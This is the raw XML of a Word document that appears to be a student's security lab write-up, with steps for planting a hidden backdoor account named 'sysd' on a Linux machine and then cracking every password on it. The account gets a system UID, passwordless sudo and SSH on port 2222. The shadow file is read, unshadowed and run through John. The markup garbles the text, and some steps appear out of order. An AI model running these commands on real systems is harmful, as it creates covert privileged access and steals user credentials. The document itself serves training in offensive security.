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8A49D" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332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Ryan Miller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4FDB9F" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332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a secret user named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Make sure this user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doesn't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have a home folder created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A952A1" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Sudo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useradd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sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="42D3CB98" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332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Give your secret user a password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52366FA4" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Sudo passwd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sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D65D63A" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332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Give your secret user a system UID &lt; 1000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D814E9" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Sudo usermod -u 999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sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7AA6FE11" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332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Give your secret user the same GID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736DC0B1" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Sudo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groupmod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-g 999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sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="54864381" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332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Give your secret user full sudo access without the need for a password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD899C9" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Sudo usermod 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sudo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sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39907967" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332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Test that sudo access works without your password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768E45E6" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332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#Change user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4B1C6E75" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F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sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1CC6598B" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F"/>
    <w:p w14:paraId="0065F793" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332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#Test sudo access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D78037" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332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sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005EB892" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">Allow </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> access over port 2222.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDB5AD5" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332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Command to edit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sshd_config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file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16387426" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332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Sudo nano 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ssh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sshd_config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0ECCA4B5" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332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(add ‘Port 2222’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD7717E" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332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Command to restart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ssh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service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7329E263" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Sudo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systemctl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restart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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28DED438" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332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Exit the root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078043AF" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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-sysadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB15428" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332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SSH to the target machine using your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account and port 2222:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F67C97" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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Sudo nano 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ssh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sshd_config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32168293" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332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Use sudo to switch to the root user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249C1373" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Sudo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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A2F8A6" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">Crack </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> the passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1129B1ED" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F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Ssh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back to the system using your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account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079B9EBA" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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Sudo nano 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ssh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sshd_config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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7824FFF0" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F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John to crack the entire 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/shadow file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3E7B8722" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1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Cat 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/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FC0163" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1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Cat 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/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CE0B3C" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1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Unshadow passwd.txt shadow.txt &gt; passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C91AF3A" w14:textId="77777777" w:rsidR="003D332F" w:rsidRDefault="003D332F" w:rsidP="003D332F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20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John passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BBF5FF" w14:textId="77777777" w:rsidR="00320A90" w:rsidRPr="003D332F" w:rsidRDefault="00320A90" w:rsidP="003D332F"/>
    <w:sectPr w:rsidR="00320A90" w:rsidRPr="003D33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02513"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F8D81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E43AE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="25F8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67981"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28FC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75E33"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="31482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F27129"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB7E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663C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08A2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1263F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F441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EA38F8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6540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774E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48A0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DD4E1D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6AA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364256"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="624A23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61B4D20"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D28E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9D40112"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7CB010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B0B2D8C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="43C4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5D3004"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="82846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F7B48A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="856285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3725C50"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="407C69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7CD65C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="049C54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BE5132"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4092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6D7A93"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="334C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11"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="1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A90"/>
    <w:rsid w:val="00320A90"/>
    <w:rsid w:val="003D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F5E2"/>
  <w15:docId w15:val="{133B4B07-3CBA-4503-BE2D-73B82631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D3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0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Miller</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-15T16:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-15T16:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>